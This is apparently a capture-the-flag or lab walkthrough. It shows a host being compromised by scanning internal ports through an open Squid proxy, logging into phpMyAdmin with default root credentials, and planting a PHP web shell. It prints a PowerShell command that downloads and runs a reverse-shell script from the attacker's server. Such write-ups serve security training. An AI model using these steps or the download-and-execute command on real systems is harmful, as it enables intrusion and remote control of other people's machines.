root💀haxor:~#

Try Harder!.

View on GitHub

First thing first we start with scanning the host for open ports using rustscan then use nmap to further enumerate those ports open

1

# Nmap 7.92 scan initiated Fri Jan 13 14:46:40 2023 as: nmap -sCV -A -p3128 -oN nmapscan -Pn 192.168.68.189
Nmap scan report for 192.168.68.189
Host is up (0.22s latency).

PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 13 14:47:16 2023 -- 1 IP address (1 host up) scanned in 36.55 seconds

From the scan result we see that its a linux box and has only one port open which is port 3128 and the service that runs on it is squid proxy.

Now what is Squid Proxy: Squid is a full-featured web proxy cache server application which provides proxy and cache services for Hyper Text Transport Protocol (HTTP), File Transfer Protocol (FTP), and other popular network protocols.

Basically its just a web proxy cache server application. And its the link between the external service and internal service

If we try accessing it we will get some sort of error 1

So we can leverage squid by scanning the internal ports open in the target

Firstly I need to generate a wordlist which will contain 1-65535 (tcp ports) 1

Then FUZZ for the internal ports and the squid proxy will be the proxy which will allow me perform this action 1

From the result we see that there are 2 internal running ports which are 3306 & 8080

Using foxy proxy we can access the internal web page using the squid ip and port 1

Now lets access it by naviagating to http://127.0.0.1:8080/ we are presented with a default page for wampserver

Looking below we see a phpmyadmin link lets click on it 1

Then logging in with the default cred root:<blank_password> we get access to the phpmyadmin panel 1

We can leverage this to get remote code execution as far as the user has write access over the web root directory which in this case its C:\wampp\www

Then creating a php code that would give us code execution and saving it in the web root directory 1

Now to get code execution we just need to call in the the file and use ?cmd= to run the command

And the web server is running as root 1

Lets get a more stable shell

I’ll be using Invoke-PowerShellTcp.ps1 script 1

So I set up a python http server on port 80 and a netcat listener on port 4444

Then to get shell i’ll use this powershell command which would load the external script and execute it in this case the powershell reverse shell script

powershell IEX(New-Object Net.WebClient).downloadString('http://<ip>:<port>/Invoke-PowerShellTcp.ps1')

1

Now back on our python http server 1

Now on our netcat listener we get a shell 1

Incase you have any problem on this or I made a mistake please be sure to DM me on discord Hack.You#9120



Back To Home